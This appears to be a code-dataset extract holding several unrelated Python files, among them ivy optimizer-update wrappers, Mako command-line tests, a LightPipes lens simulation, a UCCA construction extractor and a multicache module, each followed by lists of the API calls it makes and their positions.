    for flag, text in options:
        parser.add_argument(flag, type=str, required=True, help=text)
    return parser.parse_args()
if __name__ == '__main__':
    # Parse the CLI paths and run the full THoW + CLaMM tiling pipeline.
    ImageProcessor(parse_args()).process_all_files()
| [
"os.path.exists",
"numpy.dstack",
"PIL.Image.open",
"PIL.Image.fromarray",
"argparse.ArgumentParser",
"random.seed",
"os.mkdir",
"glob.glob"
] | [((7029, 7155), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Command line options for processing the data files needed to train the model."""'}), "(description=\n 'Command line options for processing the data files needed to train the model.'\n )\n", (7052, 7155), False, 'import argparse\n'), ((2434, 2456), 'random.seed', 'random.seed', (['self.SEED'], {}), '(self.SEED)\n', (2445, 2456), False, 'import random\n'), ((2632, 2652), 'PIL.Image.open', 'Image.open', (['filename'], {}), '(filename)\n', (2642, 2652), False, 'from PIL import Image\n'), ((4987, 5022), 'glob.glob', 'glob.glob', (['(input_path + file_suffix)'], {}), '(input_path + file_suffix)\n', (4996, 5022), False, 'import glob\n'), ((5252, 5279), 'os.path.exists', 'os.path.exists', (['output_path'], {}), '(output_path)\n', (5266, 5279), False, 'import os\n'), ((5297, 5318), 'os.mkdir', 'os.mkdir', (['output_path'], {}), '(output_path)\n', (5305, 5318), False, 'import os\n'), ((5893, 5914), 'numpy.dstack', 'np.dstack', (['([tile] * 3)'], {}), '([tile] * 3)\n', (5902, 5914), True, 'import numpy as np\n'), ((5989, 6016), 'PIL.Image.fromarray', 'Image.fromarray', (['tensorized'], {}), '(tensorized)\n', (6004, 6016), False, 'from PIL import Image\n')] |
from typing import Optional, Union, List, Dict
# local
import ivy
from ivy.container.base import ContainerBase
# noinspection PyMissingConstructor
class ContainerWithGradients(ContainerBase):
    """Container mix-in: maps ivy's gradient/optimizer update functions
    across every array leaf of an ivy.Container.

    Each ``static_*`` method dispatches through
    ContainerBase.multi_map_in_static_method; the corresponding instance
    method simply forwards ``self`` as the weights container.
    """

    @staticmethod
    def static_optimizer_update(
        w,
        effective_grad,
        lr,
        inplace=None,
        stop_gradients=True,
        key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
        to_apply: bool = True,
        prune_unapplied: bool = False,
        map_sequences: bool = False,
    ) -> ivy.Container:
        """Map ivy.optimizer_update over the leaves of container ``w``."""
        return ContainerBase.multi_map_in_static_method(
            "optimizer_update",
            w,
            effective_grad,
            lr,
            inplace=inplace,
            stop_gradients=stop_gradients,
            key_chains=key_chains,
            to_apply=to_apply,
            prune_unapplied=prune_unapplied,
            map_sequences=map_sequences,
        )

    def optimizer_update(
        self: ivy.Container,
        effective_grad,
        lr,
        inplace=None,
        stop_gradients=True,
        key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
        to_apply: bool = True,
        prune_unapplied: bool = False,
        map_sequences: bool = False,
    ) -> ivy.Container:
        """Instance counterpart of static_optimizer_update."""
        return self.static_optimizer_update(
            self,
            effective_grad,
            lr,
            inplace,
            stop_gradients,
            key_chains,
            to_apply,
            prune_unapplied,
            map_sequences,
        )

    @staticmethod
    def static_gradient_descent_update(
        w,
        dcdw,
        lr,
        inplace=None,
        stop_gradients=True,
        key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
        to_apply: bool = True,
        prune_unapplied: bool = False,
        map_sequences: bool = False,
    ) -> ivy.Container:
        """Map ivy.gradient_descent_update over the leaves of ``w``."""
        return ContainerBase.multi_map_in_static_method(
            "gradient_descent_update",
            w,
            dcdw,
            lr,
            inplace=inplace,
            stop_gradients=stop_gradients,
            key_chains=key_chains,
            to_apply=to_apply,
            prune_unapplied=prune_unapplied,
            map_sequences=map_sequences,
        )

    def gradient_descent_update(
        self,
        dcdw,
        lr,
        inplace=None,
        stop_gradients=True,
        key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
        to_apply: bool = True,
        prune_unapplied: bool = False,
        map_sequences: bool = False,
    ):
        """Instance counterpart of static_gradient_descent_update."""
        return self.static_gradient_descent_update(
            self,
            dcdw,
            lr,
            inplace,
            stop_gradients,
            key_chains,
            to_apply,
            prune_unapplied,
            map_sequences,
        )

    @staticmethod
    def static_lars_update(
        w,
        dcdw,
        lr,
        decay_lambda=0,
        inplace=None,
        stop_gradients=True,
        key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
        to_apply: bool = True,
        prune_unapplied: bool = False,
        map_sequences: bool = False,
    ) -> ivy.Container:
        """Map ivy.lars_update (layer-wise adaptive rate scaling) over
        the leaves of ``w``."""
        return ContainerBase.multi_map_in_static_method(
            "lars_update",
            w,
            dcdw,
            lr,
            decay_lambda=decay_lambda,
            inplace=inplace,
            stop_gradients=stop_gradients,
            key_chains=key_chains,
            to_apply=to_apply,
            prune_unapplied=prune_unapplied,
            map_sequences=map_sequences,
        )

    def lars_update(
        self,
        dcdw,
        lr,
        decay_lambda=0,
        inplace=None,
        stop_gradients=True,
        key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
        to_apply: bool = True,
        prune_unapplied: bool = False,
        map_sequences: bool = False,
    ):
        """Instance counterpart of static_lars_update."""
        return self.static_lars_update(
            self,
            dcdw,
            lr,
            decay_lambda,
            inplace,
            stop_gradients,
            key_chains,
            to_apply,
            prune_unapplied,
            map_sequences,
        )

    @staticmethod
    def static_adam_update(
        w,
        dcdw,
        lr,
        mw_tm1,
        vw_tm1,
        step,
        beta1=0.9,
        beta2=0.999,
        epsilon=1e-7,
        inplace=None,
        stop_gradients=True,
        key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
        to_apply: bool = True,
        prune_unapplied: bool = False,
        map_sequences: bool = False,
    ) -> ivy.Container:
        """Map ivy.adam_update over the leaves of ``w``."""
        return ContainerBase.multi_map_in_static_method(
            "adam_update",
            w,
            dcdw,
            lr,
            mw_tm1=mw_tm1,
            vw_tm1=vw_tm1,
            step=step,
            beta1=beta1,
            beta2=beta2,
            epsilon=epsilon,
            inplace=inplace,
            stop_gradients=stop_gradients,
            key_chains=key_chains,
            to_apply=to_apply,
            prune_unapplied=prune_unapplied,
            map_sequences=map_sequences,
        )

    def adam_update(
        self,
        dcdw,
        lr,
        mw_tm1,
        vw_tm1,
        step,
        beta1=0.9,
        beta2=0.999,
        epsilon=1e-7,
        inplace=None,
        stop_gradients=True,
        key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
        to_apply: bool = True,
        prune_unapplied: bool = False,
        map_sequences: bool = False,
    ):
        """Instance counterpart of static_adam_update."""
        return self.static_adam_update(
            self,
            dcdw,
            lr,
            mw_tm1,
            vw_tm1,
            step,
            beta1,
            beta2,
            epsilon,
            inplace,
            stop_gradients,
            key_chains,
            to_apply,
            prune_unapplied,
            map_sequences,
        )

    @staticmethod
    def static_lamb_update(
        w,
        dcdw,
        lr,
        mw_tm1,
        vw_tm1,
        step,
        beta1=0.9,
        beta2=0.999,
        epsilon=1e-7,
        max_trust_ratio=10,
        decay_lambda=0,
        inplace=None,
        stop_gradients=True,
        key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
        to_apply: bool = True,
        prune_unapplied: bool = False,
        map_sequences: bool = False,
    ) -> ivy.Container:
        """Map ivy.lamb_update over the leaves of ``w``."""
        return ContainerBase.multi_map_in_static_method(
            "lamb_update",
            w,
            dcdw,
            lr,
            mw_tm1=mw_tm1,
            vw_tm1=vw_tm1,
            step=step,
            beta1=beta1,
            beta2=beta2,
            epsilon=epsilon,
            max_trust_ratio=max_trust_ratio,
            # BUG FIX: this was hard-coded to 0, silently discarding the
            # caller's weight-decay setting; forward the argument instead
            # (matching static_lars_update).
            decay_lambda=decay_lambda,
            inplace=inplace,
            stop_gradients=stop_gradients,
            key_chains=key_chains,
            to_apply=to_apply,
            prune_unapplied=prune_unapplied,
            map_sequences=map_sequences,
        )

    def lamb_update(
        self,
        dcdw,
        lr,
        mw_tm1,
        vw_tm1,
        step,
        beta1=0.9,
        beta2=0.999,
        epsilon=1e-7,
        max_trust_ratio=10,
        decay_lambda=0,
        inplace=None,
        stop_gradients=True,
        key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
        to_apply: bool = True,
        prune_unapplied: bool = False,
        map_sequences: bool = False,
    ):
        """Instance counterpart of static_lamb_update."""
        return self.static_lamb_update(
            self,
            dcdw,
            lr,
            mw_tm1,
            vw_tm1,
            step,
            beta1,
            beta2,
            epsilon,
            max_trust_ratio,
            decay_lambda,
            inplace,
            stop_gradients,
            key_chains,
            to_apply,
            prune_unapplied,
            map_sequences,
        )
| [
"ivy.container.base.ContainerBase.multi_map_in_static_method"
] | [((562, 810), 'ivy.container.base.ContainerBase.multi_map_in_static_method', 'ContainerBase.multi_map_in_static_method', (['"""optimizer_update"""', 'w', 'effective_grad', 'lr'], {'inplace': 'inplace', 'stop_gradients': 'stop_gradients', 'key_chains': 'key_chains', 'to_apply': 'to_apply', 'prune_unapplied': 'prune_unapplied', 'map_sequences': 'map_sequences'}), "('optimizer_update', w,\n effective_grad, lr, inplace=inplace, stop_gradients=stop_gradients,\n key_chains=key_chains, to_apply=to_apply, prune_unapplied=\n prune_unapplied, map_sequences=map_sequences)\n", (602, 810), False, 'from ivy.container.base import ContainerBase\n'), ((1907, 2152), 'ivy.container.base.ContainerBase.multi_map_in_static_method', 'ContainerBase.multi_map_in_static_method', (['"""gradient_descent_update"""', 'w', 'dcdw', 'lr'], {'inplace': 'inplace', 'stop_gradients': 'stop_gradients', 'key_chains': 'key_chains', 'to_apply': 'to_apply', 'prune_unapplied': 'prune_unapplied', 'map_sequences': 'map_sequences'}), "('gradient_descent_update', w, dcdw,\n lr, inplace=inplace, stop_gradients=stop_gradients, key_chains=\n key_chains, to_apply=to_apply, prune_unapplied=prune_unapplied,\n map_sequences=map_sequences)\n", (1947, 2152), False, 'from ivy.container.base import ContainerBase\n'), ((3222, 3482), 'ivy.container.base.ContainerBase.multi_map_in_static_method', 'ContainerBase.multi_map_in_static_method', (['"""lars_update"""', 'w', 'dcdw', 'lr'], {'decay_lambda': 'decay_lambda', 'inplace': 'inplace', 'stop_gradients': 'stop_gradients', 'key_chains': 'key_chains', 'to_apply': 'to_apply', 'prune_unapplied': 'prune_unapplied', 'map_sequences': 'map_sequences'}), "('lars_update', w, dcdw, lr,\n decay_lambda=decay_lambda, inplace=inplace, stop_gradients=\n stop_gradients, key_chains=key_chains, to_apply=to_apply,\n prune_unapplied=prune_unapplied, map_sequences=map_sequences)\n", (3262, 3482), False, 'from ivy.container.base import ContainerBase\n'), ((4674, 4997), 
'ivy.container.base.ContainerBase.multi_map_in_static_method', 'ContainerBase.multi_map_in_static_method', (['"""adam_update"""', 'w', 'dcdw', 'lr'], {'mw_tm1': 'mw_tm1', 'vw_tm1': 'vw_tm1', 'step': 'step', 'beta1': 'beta1', 'beta2': 'beta2', 'epsilon': 'epsilon', 'inplace': 'inplace', 'stop_gradients': 'stop_gradients', 'key_chains': 'key_chains', 'to_apply': 'to_apply', 'prune_unapplied': 'prune_unapplied', 'map_sequences': 'map_sequences'}), "('adam_update', w, dcdw, lr, mw_tm1\n =mw_tm1, vw_tm1=vw_tm1, step=step, beta1=beta1, beta2=beta2, epsilon=\n epsilon, inplace=inplace, stop_gradients=stop_gradients, key_chains=\n key_chains, to_apply=to_apply, prune_unapplied=prune_unapplied,\n map_sequences=map_sequences)\n", (4714, 4997), False, 'from ivy.container.base import ContainerBase\n'), ((6470, 6843), 'ivy.container.base.ContainerBase.multi_map_in_static_method', 'ContainerBase.multi_map_in_static_method', (['"""lamb_update"""', 'w', 'dcdw', 'lr'], {'mw_tm1': 'mw_tm1', 'vw_tm1': 'vw_tm1', 'step': 'step', 'beta1': 'beta1', 'beta2': 'beta2', 'epsilon': 'epsilon', 'max_trust_ratio': 'max_trust_ratio', 'decay_lambda': '(0)', 'inplace': 'inplace', 'stop_gradients': 'stop_gradients', 'key_chains': 'key_chains', 'to_apply': 'to_apply', 'prune_unapplied': 'prune_unapplied', 'map_sequences': 'map_sequences'}), "('lamb_update', w, dcdw, lr, mw_tm1\n =mw_tm1, vw_tm1=vw_tm1, step=step, beta1=beta1, beta2=beta2, epsilon=\n epsilon, max_trust_ratio=max_trust_ratio, decay_lambda=0, inplace=\n inplace, stop_gradients=stop_gradients, key_chains=key_chains, to_apply\n =to_apply, prune_unapplied=prune_unapplied, map_sequences=map_sequences)\n", (6510, 6843), False, 'from ivy.container.base import ContainerBase\n')] |
from __future__ import with_statement
from contextlib import contextmanager
from test import TemplateTest, eq_, raises, template_base, mock
import os
from mako.cmd import cmdline
class CmdTest(TemplateTest):
    """Tests for the ``mako.cmd.cmdline`` entry point.

    Each test patches sys.stdout/sys.stderr (and sometimes sys.stdin)
    with mocks and then inspects ``write.mock_calls`` to assert on what
    cmdline printed.  Error-path tests additionally expect cmdline to
    exit via SystemExit.
    """

    @contextmanager
    def _capture_output_fixture(self, stream="stdout"):
        # Replace the named sys stream with a mock for the duration of
        # the block and hand the mock back so tests can inspect writes.
        with mock.patch("sys.%s" % stream) as stdout:
            yield stdout

    def test_stdin_success(self):
        """Rendering a valid template read from stdin writes the result
        to stdout."""
        with self._capture_output_fixture() as stdout:
            with mock.patch("sys.stdin", mock.Mock(
                    read=mock.Mock(return_value="hello world ${x}"))):
                cmdline(["--var", "x=5", "-"])

        # first positional arg of the first stdout.write() call
        eq_(stdout.write.mock_calls[0][1][0], "hello world 5")

    def test_stdin_syntax_err(self):
        """A template syntax error from stdin exits and reports the
        exception with a traceback on stderr."""
        with mock.patch("sys.stdin", mock.Mock(
                read=mock.Mock(return_value="${x"))):
            with self._capture_output_fixture("stderr") as stderr:
                with raises(SystemExit):
                    cmdline(["--var", "x=5", "-"])

            assert "SyntaxException: Expected" in \
                stderr.write.mock_calls[0][1][0]
            assert "Traceback" in stderr.write.mock_calls[0][1][0]

    def test_stdin_rt_err(self):
        """An undefined template variable from stdin exits and reports a
        NameError with a traceback on stderr."""
        with mock.patch("sys.stdin", mock.Mock(
                read=mock.Mock(return_value="${q}"))):
            with self._capture_output_fixture("stderr") as stderr:
                with raises(SystemExit):
                    cmdline(["--var", "x=5", "-"])

            assert "NameError: Undefined" in stderr.write.mock_calls[0][1][0]
            assert "Traceback" in stderr.write.mock_calls[0][1][0]

    def test_file_success(self):
        """Rendering a valid template file writes the result to stdout."""
        with self._capture_output_fixture() as stdout:
            cmdline(["--var", "x=5",
                     os.path.join(template_base, "cmd_good.mako")])

        eq_(stdout.write.mock_calls[0][1][0], "hello world 5")

    def test_file_syntax_err(self):
        """A syntax error in a template file exits with the exception and
        traceback on stderr."""
        with self._capture_output_fixture("stderr") as stderr:
            with raises(SystemExit):
                cmdline(["--var", "x=5",
                         os.path.join(template_base, "cmd_syntax.mako")])

        assert "SyntaxException: Expected" in stderr.write.mock_calls[0][1][0]
        assert "Traceback" in stderr.write.mock_calls[0][1][0]

    def test_file_rt_err(self):
        """A runtime error in a template file exits with a NameError and
        traceback on stderr."""
        with self._capture_output_fixture("stderr") as stderr:
            with raises(SystemExit):
                cmdline(["--var", "x=5",
                         os.path.join(template_base, "cmd_runtime.mako")])

        assert "NameError: Undefined" in stderr.write.mock_calls[0][1][0]
        assert "Traceback" in stderr.write.mock_calls[0][1][0]

    def test_file_notfound(self):
        """A nonexistent template file exits with the expected message."""
        with raises(SystemExit, "error: can't find fake.lalala"):
            cmdline(["--var", "x=5", "fake.lalala"])
| [
"mako.cmd.cmdline",
"test.raises",
"os.path.join",
"test.mock.patch",
"test.eq_",
"test.mock.Mock"
] | [((641, 695), 'test.eq_', 'eq_', (['stdout.write.mock_calls[0][1][0]', '"""hello world 5"""'], {}), "(stdout.write.mock_calls[0][1][0], 'hello world 5')\n", (644, 695), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((1849, 1903), 'test.eq_', 'eq_', (['stdout.write.mock_calls[0][1][0]', '"""hello world 5"""'], {}), "(stdout.write.mock_calls[0][1][0], 'hello world 5')\n", (1852, 1903), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((298, 327), 'test.mock.patch', 'mock.patch', (["('sys.%s' % stream)"], {}), "('sys.%s' % stream)\n", (308, 327), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((2741, 2792), 'test.raises', 'raises', (['SystemExit', '"""error: can\'t find fake.lalala"""'], {}), '(SystemExit, "error: can\'t find fake.lalala")\n', (2747, 2792), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((2806, 2846), 'mako.cmd.cmdline', 'cmdline', (["['--var', 'x=5', 'fake.lalala']"], {}), "(['--var', 'x=5', 'fake.lalala'])\n", (2813, 2846), False, 'from mako.cmd import cmdline\n'), ((601, 631), 'mako.cmd.cmdline', 'cmdline', (["['--var', 'x=5', '-']"], {}), "(['--var', 'x=5', '-'])\n", (608, 631), False, 'from mako.cmd import cmdline\n'), ((2021, 2039), 'test.raises', 'raises', (['SystemExit'], {}), '(SystemExit)\n', (2027, 2039), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((2415, 2433), 'test.raises', 'raises', (['SystemExit'], {}), '(SystemExit)\n', (2421, 2433), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((936, 954), 'test.raises', 'raises', (['SystemExit'], {}), '(SystemExit)\n', (942, 954), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((976, 1006), 'mako.cmd.cmdline', 'cmdline', (["['--var', 'x=5', '-']"], {}), "(['--var', 'x=5', '-'])\n", (983, 1006), False, 'from mako.cmd import cmdline\n'), ((1422, 1440), 'test.raises', 'raises', 
(['SystemExit'], {}), '(SystemExit)\n', (1428, 1440), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((1462, 1492), 'mako.cmd.cmdline', 'cmdline', (["['--var', 'x=5', '-']"], {}), "(['--var', 'x=5', '-'])\n", (1469, 1492), False, 'from mako.cmd import cmdline\n'), ((1793, 1837), 'os.path.join', 'os.path.join', (['template_base', '"""cmd_good.mako"""'], {}), "(template_base, 'cmd_good.mako')\n", (1805, 1837), False, 'import os\n'), ((815, 844), 'test.mock.Mock', 'mock.Mock', ([], {'return_value': '"""${x"""'}), "(return_value='${x')\n", (824, 844), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((1300, 1330), 'test.mock.Mock', 'mock.Mock', ([], {'return_value': '"""${q}"""'}), "(return_value='${q}')\n", (1309, 1330), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((2110, 2156), 'os.path.join', 'os.path.join', (['template_base', '"""cmd_syntax.mako"""'], {}), "(template_base, 'cmd_syntax.mako')\n", (2122, 2156), False, 'import os\n'), ((2504, 2551), 'os.path.join', 'os.path.join', (['template_base', '"""cmd_runtime.mako"""'], {}), "(template_base, 'cmd_runtime.mako')\n", (2516, 2551), False, 'import os\n'), ((539, 581), 'test.mock.Mock', 'mock.Mock', ([], {'return_value': '"""hello world ${x}"""'}), "(return_value='hello world ${x}')\n", (548, 581), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n')] |
from LightPipes import *
import matplotlib.pyplot as plt
def TheExample(N):
    """Focus a plane wave two ways on an N x N grid and plot the results.

    Route 1 uses Lens followed by plain Fresnel propagation; route 2 uses
    Lens + LensFresnel with a coordinate Convert.  Phase and intensity
    cross-sections plus the two intensity images are drawn side by side.
    """
    fig = plt.figure(figsize=(11, 9.5))
    ax1 = fig.add_subplot(221)
    ax2 = fig.add_subplot(222)
    ax3 = fig.add_subplot(223)
    ax4 = fig.add_subplot(224)

    wavelength = 1000 * nm
    size = 10 * mm
    f1 = 10 * m
    f2 = 1.11111111 * m
    z = 1.0 * m
    w = 5 * mm

    field = Begin(size, wavelength, N)
    field = RectAperture(w, w, 0, 0, 0, field)

    # Route 1: thin lens, then free-space Fresnel propagation.
    F1 = Lens(z, 0, 0, field)
    F1 = Fresnel(z, F1)
    phi1 = PhaseUnwrap(Phase(F1))
    I1 = Intensity(0, F1)
    x1 = [(-size / 2 + i * size / N) / mm for i in range(N)]

    # Route 2: lens + LensFresnel propagation with coordinate conversion.
    F2 = Lens(f1, 0, 0, field)
    F2 = LensFresnel(f2, z, F2)
    F2 = Convert(F2)
    phi2 = PhaseUnwrap(Phase(F2))
    I2 = Intensity(0, F2)
    newsize = size / 10
    x2 = [(-newsize / 2 + i * newsize / N) / mm for i in range(N)]

    mid = int(N / 2)
    ax1.plot(x1, phi1[mid], 'k--', label='Lens + Fresnel')
    ax1.plot(x2, phi2[mid], 'k', label='LensFresnel + Convert')
    ax1.set_xlim(-newsize / 2 / mm, newsize / 2 / mm)
    ax1.set_ylim(-2, 4)
    ax1.set_xlabel('x [mm]')
    ax1.set_ylabel('phase [rad]')
    ax1.set_title('phase, N = %d' % N)
    ax1.legend(loc='upper center', shadow=True)

    ax2.plot(x1, I1[mid], 'k--', label='Lens+Fresnel')
    ax2.plot(x2, I2[mid], 'k', label='LensFresnel + Convert')
    ax2.set_xlim(-newsize / 2 / mm, newsize / 2 / mm)
    ax2.set_ylim(0, 1000)
    ax2.set_xlabel('x [mm]')
    ax2.set_ylabel('Intensity [a.u.]')
    ax2.set_title('intensity, N = %d' % N)
    ax2.legend(loc='upper center', shadow=True)

    ax3.imshow(I1)
    ax3.axis('off')
    ax3.set_title('Intensity, Lens + Fresnel, N = %d' % N)
    ax3.set_xlim(mid - N / 20, mid + N / 20)
    ax3.set_ylim(mid - N / 20, mid + N / 20)

    ax4.imshow(I2)
    ax4.axis('off')
    ax4.set_title('Intensity, LensFresnel + Convert, N = %d' % N)

    plt.show()


for grid_points in (100, 1000):  # 100x100 grid, then 1000x1000 grid
    TheExample(grid_points)
| [
"matplotlib.pyplot.figure",
"matplotlib.pyplot.show"
] | [((85, 114), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(11, 9.5)'}), '(figsize=(11, 9.5))\n', (95, 114), True, 'import matplotlib.pyplot as plt\n'), ((1906, 1916), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1914, 1916), True, 'import matplotlib.pyplot as plt\n')] |
from argparse import ArgumentParser
from ucca import constructions
from ucca.ioutil import read_files_and_dirs
if __name__ == "__main__":
    # Build the CLI: positional passage files plus the construction
    # selection flags contributed by ucca.constructions.
    parser = ArgumentParser(description="Extract linguistic constructions from UCCA corpus.")
    parser.add_argument("passages", nargs="+", help="the corpus, given as xml/pickle file names")
    constructions.add_argument(parser, False)
    parser.add_argument("-v", "--verbose", action="store_true", help="print tagged text for each passage")
    args = parser.parse_args()
    for passage in read_files_and_dirs(args.passages):
        if args.verbose:
            print("%s:" % passage.ID)
        by_construction = constructions.extract_edges(
            passage, constructions=args.constructions, verbose=args.verbose)
        if not any(by_construction.values()):
            continue  # nothing matched in this passage
        if not args.verbose:
            print("%s:" % passage.ID)
        for construction, edges in by_construction.items():
            if edges:
                print("  %s:" % construction.description)
                for edge in edges:
                    print("    %s [%s %s]" % (edge, edge.tag, edge.child))
        print()
| [
"ucca.ioutil.read_files_and_dirs",
"ucca.constructions.extract_edges",
"ucca.constructions.add_argument",
"argparse.ArgumentParser"
] | [((162, 247), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""Extract linguistic constructions from UCCA corpus."""'}), "(description='Extract linguistic constructions from UCCA corpus.'\n )\n", (176, 247), False, 'from argparse import ArgumentParser\n'), ((350, 394), 'ucca.constructions.add_argument', 'constructions.add_argument', (['argparser', '(False)'], {}), '(argparser, False)\n', (376, 394), False, 'from ucca import constructions\n'), ((561, 595), 'ucca.ioutil.read_files_and_dirs', 'read_files_and_dirs', (['args.passages'], {}), '(args.passages)\n', (580, 595), False, 'from ucca.ioutil import read_files_and_dirs\n'), ((683, 779), 'ucca.constructions.extract_edges', 'constructions.extract_edges', (['passage'], {'constructions': 'args.constructions', 'verbose': 'args.verbose'}), '(passage, constructions=args.constructions,\n verbose=args.verbose)\n', (710, 779), False, 'from ucca import constructions\n')] |
import hashlib
import os
import pickle
import tempfile
import zlib
from threading import Lock
from time import time
from multicache.base import BaseCache
try:
from multicache.redis import RedisCache
except ImportError:
pass
lock = Lock()
class DummyCache(BaseCache):
    """No-op cache: satisfies the BaseCache interface while never
    storing or returning anything, so callers can run "cache-free"
    without special-casing."""

    def __init__(self):
        # kept for interface parity with the real cache backends
        self._dict = {}

    def get(self, key):
        # every lookup is a miss
        return None

    def put(self, key, value, ex=None, ttl=None):
        # discard silently
        pass

    def invalidate(self, key):
        # nothing is stored, so nothing to remove
        pass
class DictCache(BaseCache):
    """In-memory cache backed by a plain dict, with no persistent
    storage.  Entries are stored as (value, expiry) tuples, where
    expiry is an absolute time.time() timestamp.

    CONSISTENCY FIX: previously get() treated an entry live only while
    ``expiry > now``, but get_all_values() used ``>=`` and recheck()
    used ``now > expiry``, so an entry expiring exactly "now" was
    invisible to get() yet still returned by get_all_values().  All
    methods now use get()'s strict ``expiry > now`` boundary.
    """

    def __init__(self, **kwargs):
        self._dict = {}
        # default time-to-live in seconds for entries stored without an
        # explicit expiry
        self.ttl = kwargs.pop('ttl', 3600)

    def get(self, key):
        """Return the cached value for ``key``, or None on miss/expiry.
        Stale entries are evicted on access."""
        ret = self._dict.get(key, None)
        if ret is not None and ret[1] > time():
            # cache hit
            return ret[0]
        elif ret is None:
            # cache miss
            return None
        else:
            # stale, delete from cache
            self.invalidate(key)
            return None

    def put(self, key, value, ex=None, ttl=None):
        """Store ``value`` under ``key`` until absolute time ``ex``, or
        for ``ttl`` seconds (falling back to the instance default)."""
        with lock:
            if ex is None:
                if ttl is not None:
                    ex = ttl + time()
                else:
                    ex = self.ttl + time()
            self._dict[key] = value, ex

    def invalidate(self, key):
        """Drop ``key`` from the cache if present."""
        self._dict.pop(key, None)

    def get_all_keys(self):
        """Return the stored keys (may include not-yet-evicted stale
        entries)."""
        return self._dict.keys()

    def get_all_values(self):
        """Return the values of all entries that are still live, using
        the same strict expiry test as get()."""
        return [val[0] for val in self._dict.values() if val[1] > time()]

    def recheck(self):
        """Evict every entry whose expiry time has been reached."""
        invalid = [key for key, val in self._dict.items() if val[1] <= time()]
        for key in invalid:
            self.invalidate(key)
class FileCache(BaseCache):
    """Cache that mirrors every entry to an in-memory dict and to
    compressed pickle files on disk.  Writes always go to both; reads
    try the dict first and fall back to the file."""

    def __init__(self, path=None, **kwargs):
        self._cache = {}
        # default time-to-live in seconds
        self.ttl = kwargs.pop('ttl', 3600)
        if path:
            self.path = path
        else:
            self.path = '{}/multicache'.format(tempfile.gettempdir())
        # BUG FIX: os.path.isdir + os.mkdir raced when two processes
        # started at once; makedirs(exist_ok=True) creates the directory
        # (and any missing parents) without the check-then-create window.
        os.makedirs(self.path, mode=0o700, exist_ok=True)

    def _getpath(self, key):
        """Return the on-disk cache file path for ``key`` (md5 of the
        UTF-8 encoded key, plus '.cache')."""
        h = hashlib.new('md5')
        h.update(key.encode('utf-8'))
        return os.path.join(self.path, h.hexdigest() + '.cache')

    def put(self, key, value, ex=None, ttl=None):
        """Store ``value`` under ``key`` on disk and in memory, expiring
        at absolute time ``ex`` or after ``ttl`` seconds (defaulting to
        the instance ttl)."""
        with lock:
            with open(self._getpath(key), 'wb') as f:
                if ex is None:
                    if ttl is not None:
                        ex = ttl + time()
                    else:
                        ex = self.ttl + time()
                # file holds a compressed pickle of (value, expiry)
                f.write(zlib.compress(pickle.dumps((value, ex), -1)))
            self._cache[key] = (value, ex)

    def get(self, key):
        """Return the cached value for ``key``, or None on miss/expiry.
        A stale entry is invalidated (memory and disk) on access."""
        if key in self._cache:
            cached = self._cache[key]
            if cached[1] > time():
                return cached[0]
        try:
            with open(self._getpath(key), 'rb') as f:
                ret = pickle.loads(zlib.decompress(f.read()))
                if ret[1] > time():
                    # cache hit
                    return ret[0]
            # stale cache, invalidate
            self.invalidate(key)
            return None
        except IOError as ex:
            if ex.errno == 2:  # file does not exist (yet)
                return None
            else:
                raise

    def invalidate(self, key):
        """Remove ``key`` from memory and delete its cache file if it
        exists."""
        with lock:
            self._cache.pop(key, None)
            try:
                os.unlink(self._getpath(key))
            except OSError as ex:
                if ex.errno == 2:  # does not exist
                    pass
                else:
                    raise
| [
"hashlib.new",
"pickle.dumps",
"threading.Lock",
"os.path.isdir",
"tempfile.gettempdir",
"os.mkdir",
"time.time"
] | [((241, 247), 'threading.Lock', 'Lock', ([], {}), '()\n', (245, 247), False, 'from threading import Lock\n'), ((2364, 2382), 'hashlib.new', 'hashlib.new', (['"""md5"""'], {}), "('md5')\n", (2375, 2382), False, 'import hashlib\n'), ((2257, 2281), 'os.path.isdir', 'os.path.isdir', (['self.path'], {}), '(self.path)\n', (2270, 2281), False, 'import os\n'), ((2295, 2319), 'os.mkdir', 'os.mkdir', (['self.path', '(448)'], {}), '(self.path, 448)\n', (2303, 2319), False, 'import os\n'), ((876, 882), 'time.time', 'time', ([], {}), '()\n', (880, 882), False, 'from time import time\n'), ((1733, 1739), 'time.time', 'time', ([], {}), '()\n', (1737, 1739), False, 'from time import time\n'), ((2219, 2240), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (2238, 2240), False, 'import tempfile\n'), ((3030, 3036), 'time.time', 'time', ([], {}), '()\n', (3034, 3036), False, 'from time import time\n'), ((1621, 1627), 'time.time', 'time', ([], {}), '()\n', (1625, 1627), False, 'from time import time\n'), ((3229, 3235), 'time.time', 'time', ([], {}), '()\n', (3233, 3235), False, 'from time import time\n'), ((1283, 1289), 'time.time', 'time', ([], {}), '()\n', (1287, 1289), False, 'from time import time\n'), ((1348, 1354), 'time.time', 'time', ([], {}), '()\n', (1352, 1354), False, 'from time import time\n'), ((2834, 2863), 'pickle.dumps', 'pickle.dumps', (['(value, ex)', '(-1)'], {}), '((value, ex), -1)\n', (2846, 2863), False, 'import pickle\n'), ((2716, 2722), 'time.time', 'time', ([], {}), '()\n', (2720, 2722), False, 